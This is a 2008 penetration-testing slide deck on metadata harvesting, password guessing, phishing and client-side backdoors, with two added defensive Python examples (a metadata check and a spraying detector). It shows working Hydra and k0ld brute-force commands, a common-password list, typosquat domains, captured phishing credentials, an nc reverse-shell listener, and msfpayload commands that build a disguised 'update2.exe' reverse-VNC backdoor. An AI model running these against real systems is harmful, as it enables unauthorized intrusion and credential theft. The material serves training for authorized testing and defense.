Beyond Front-Line Exploits: Tips and Tools for Comprehensive Penetration Testing

Lenny Zeltser
Security Consultant, SAVVIS
Senior Faculty Member, SANS Institute
Handler, SANS Internet Storm Center

August 2008

Pen testing usually involves locating and exploiting software bugs.

© 2008 Lenny Zeltser


Attack surface of many server environments is very limited.

What if you couldn’t exploit any software vulnerabilities?


Consider 4 techniques for going beyond the front-line approach.

Data in plain sight

Social engineering

Remote password-guessing

Client-side backdoors


#1: Data in plain sight


Google

site:example.com filetype:pdf
site:example.com filetype:ppt
site:example.com filetype:doc


libextractor

$ extract sample.pdf sample.ppt sample.doc

$ extract overview.ppt
paragraph count - 2
last saved by - Lenny Zeltser
title - Project overview
creation date - 2008-03-14T01:58:53Z
creator - John Smith
word count - 5
date - 2008-03-14T04:56:57Z
generator - Microsoft Office PowerPoint
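The defender's counterpart to the libextractor output above is a pre-publication check that reports which names a document would leak. This Python example is added here and is not part of the original slides: it reads the core properties (docProps/core.xml) of an Office Open XML package (.docx/.pptx/.xlsx) and lists the creator and last-saved-by names. The sample package is constructed in memory with the field values shown on the slide; no real deck is read.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by docProps/core.xml inside .docx/.pptx/.xlsx packages.
NS = {"cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
      "dc": "http://purl.org/dc/elements/1.1/",
      "dcterms": "http://purl.org/dc/terms/"}

# Core properties to review before publishing; labels match the libextractor output above.
FIELDS = {"creator": "dc:creator", "last saved by": "cp:lastModifiedBy",
          "title": "dc:title", "creation date": "dcterms:created"}

def extract_core_properties(data: bytes) -> dict:
    """Return the reviewed core properties of an OOXML package ({} if it has none)."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return found
        root = ET.fromstring(zf.read("docProps/core.xml"))
        for label, path in FIELDS.items():
            el = root.find(path, NS)
            if el is not None and el.text and el.text.strip():
                found[label] = el.text.strip()
    return found

def leaked_identities(props: dict) -> list:
    """Personal names that would be exposed if the document went out as-is."""
    return sorted({props[k] for k in ("creator", "last saved by") if k in props})

def build_sample_pptx() -> bytes:
    """Constructed minimal package carrying the metadata shown on the slide (not a real deck)."""
    core = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
            '<dc:title>Project overview</dc:title><dc:creator>John Smith</dc:creator>'
            '<cp:lastModifiedBy>Lenny Zeltser</cp:lastModifiedBy>'
            '<dcterms:created xsi:type="dcterms:W3CDTF">2008-03-14T01:58:53Z</dcterms:created>'
            '</cp:coreProperties>') % (NS["cp"], NS["dc"], NS["dcterms"])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()

if __name__ == "__main__":
    props = extract_core_properties(build_sample_pptx())
    for label, value in props.items():
        print(f"{label} - {value}")
    print("names exposed:", ", ".join(leaked_identities(props)))
```

Running the same check over every file in a web root before it goes live catches exactly the names Metagoofil would later harvest.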


Google + libextractor = Metagoofil

$ metagoofil.py -d example.com -f all -l 10 -o o.html -t o

$ metagoofil.py -d zeltser.com -f all -l 10 -o o.html -t o
[+] Searching in zeltser.com for: pdf
[+] Total results in google: 11
[ 1/11 ] http://www.zeltser.com/.../impersonation-attacks.pdf
[ 2/11 ] http://www.zeltser.com/.../multi-firewall.pdf
...
[+] Searching results: 0
[ 1/1 ] http://www.zeltser.com/.../malicious-agents.ppt
Usernames found:
================
Lenny Zeltser (www.zeltser.com)


Finding documents via Maltego


Finding interesting files via Maltego


#2: Remote Password-Guessing


Potential usernames: ranked word lists

http://www.census.gov/genealogy/names/names_files.html

Top Last Names    Top Female First Names    Top Male First Names
smith             mary                      james
johnson           patricia                  john
williams          linda                     robert
jones             barbara                   michael
brown             elizabeth                 william
davis             jennifer                  david
miller            maria                     richard


Potential usernames: theHarvester

$ theHarvester.py -d example.com -l 3 -b google
[email protected]
[email protected]
[email protected]

$ theHarvester.py -d example.com -l 3 -b linkedin
Mark Jameson
James Quieras
Robert Marcus

$ theHarvester.py -d example.com -l 3 -b pgp
[email protected]
[email protected]
[email protected]


Wrong username vs. password


Confirm usernames with Brutus by varying only usernames.

[Brutus configuration: many usernames, one password]


A head-on brute-force password attack will probably fail.

Create a short list of potential passwords.
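The pattern these slides describe (a few likely passwords tried across many usernames, so that the distinct-username count, not the attempt count per account, is the tell) is what a defender should alert on. The following Python detection logic is an added example, not part of the original deck; the log format, field names and IP addresses are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth log (syslog-style, simplified); not from the original slides.
# 203.0.113.7 tries one password against seven surnames; 198.51.100.4 is a user mistyping.
SAMPLE_LOG = """\
2008-08-01T10:00:01Z auth FAILED user=smith src=203.0.113.7
2008-08-01T10:00:02Z auth FAILED user=johnson src=203.0.113.7
2008-08-01T10:00:03Z auth FAILED user=williams src=203.0.113.7
2008-08-01T10:00:04Z auth FAILED user=jones src=203.0.113.7
2008-08-01T10:00:05Z auth FAILED user=brown src=203.0.113.7
2008-08-01T10:00:06Z auth FAILED user=davis src=203.0.113.7
2008-08-01T10:00:07Z auth FAILED user=miller src=203.0.113.7
2008-08-01T10:00:09Z auth FAILED user=jsmith src=198.51.100.4
2008-08-01T10:00:15Z auth FAILED user=jsmith src=198.51.100.4
2008-08-01T10:00:40Z auth OK user=jsmith src=198.51.100.4
"""

LINE_RE = re.compile(r"^(\S+) auth (FAILED|OK) user=(\S+) src=(\S+)$")

def parse_events(log_text):
    """Yield (timestamp, result, user, src) for each well-formed line; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m.group(2), m.group(3), m.group(4)

def detect_spraying(log_text, window=timedelta(minutes=5), min_users=5):
    """Flag sources whose failures touch >= min_users distinct accounts inside one window.
    Per-account lockout counters never fire on this pattern; the per-source username count does."""
    failures = defaultdict(list)
    for ts, result, user, src in parse_events(log_text):
        if result == "FAILED":
            failures[src].append((ts, user))
    alerts = {}
    for src, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            if len({u for _, u in events[start:end + 1]}) >= min_users:
                alerts[src] = sorted({u for _, u in events})  # report every account it touched
                break
    return alerts

if __name__ == "__main__":
    for src, users in detect_spraying(SAMPLE_LOG).items():
        print(f"possible password spraying from {src}: {', '.join(users)}")
```

The same rule applied to the "wrong username vs. password" slide: if the service's error messages differ, the flagged source will show a high proportion of non-existent usernames, which is the enumeration phase rather than the guessing phase.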


Some common generic passwords

password    baseball1   iloveyou    querty1     soccer
password1   football1   iloveyou1   querty123   windows
abc123      123456      monkey      bitch1      1qaz2wsx
123abc      123123      cookie123   flower      gospel
fuckyou     monkey1     miss4you    123qwe      superman 1
fuckyou1    princess1   clumsy      manager     admin


Best results with a company-specific dictionary file

Briefly Britain British brother browser Bugtraq Bugbear bundled


Password recovery mechanisms are weak links.

They often depend on the security of the email system.


Also, “secret question” recovery is a prime candidate for attack.


Letting users select their own questions is particularly weak.


Use LDAP if you find it—much faster authentication.

$ hydra -L users.txt -P passwords.txt ldap.example.com ldap2
Hydra v5.4 (c) 2006 by van Hauser / THC Hydra (http://www.thc.org)
15 tasks, 26753 login tries
[DATA] attacking service ldap2 on port 389
[389][ldap] login: CN=Robert Marcus,OU=IT,O=ACME Example   password: Bugbear

$ k0ld -f users.txt -w passwords.txt -I -o out.txt -f 'cn=*' -h ldap.example.com


Brute-force Remote Desktop credentials with TSGrinder.


TSGrinder is slow, and requires an older Remote Desktop client (v5).


#3: Social engineering


Tricking employees into releasing information works too well.


Email phishing-style campaigns can obtain logon credentials.


ArGoSoft Mail Server Freeware helps relay spoofed email.


You can register a domain that resembles that of the target.

http://www.domaintools.com/domain-typo

xeample.com
eaxmple.com
exampe.net
exapmle.com
eaxmple.com
wwwexample.com
exampel.com


Too many users will give up their logon credentials.


The site can also capture client-side details for follow-on attacks.

USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1; Mozilla Default Plug-in; RealJukebox NS Plugin; RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit); Shockwave Flash; Java(TM) Platform SE 6 U2;


#4: Client-Side Backdoors


Keeping up with security patches on laptops and desktops is hard.


Tools such as Core Impact and Metasploit help target client-side vulnerabilities.


It may be more effective just to ask the user to install the backdoor.


The backdoor can connect to the attacking system via reverse-shell.

C:\attacker> nc -l -p 80
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights reserved
C:\Windows\Temp> dir
...


Metasploit can generate stand-alone payloads. Example: Reverse-VNC.

$ msfpayload windows/vncinject/reverse_tcp LPORT=5544 LHOST=192.168.1.124 DisableCourtesyShell=True X > update2.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/vncinject/reverse_tcp
Length: 177
Options: LHOST=192.168.1.124,LPORT=5544,DisableCourtesyShell=True

$ msfcli exploit/multi/handler LPORT=5544 PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124 DisableCourtesyShell=True E


Reverse-VNC can control a system even if it is behind a firewall.


A system compromise is just a means to an end.


Consider previous scenarios when defining your rules of engagement.


These approaches increase the chances of a “successful” pen test.

Data in plain sight

Social engineering

Remote password-guessing

Client-side backdoors


Lenny Zeltser www.zeltser.com

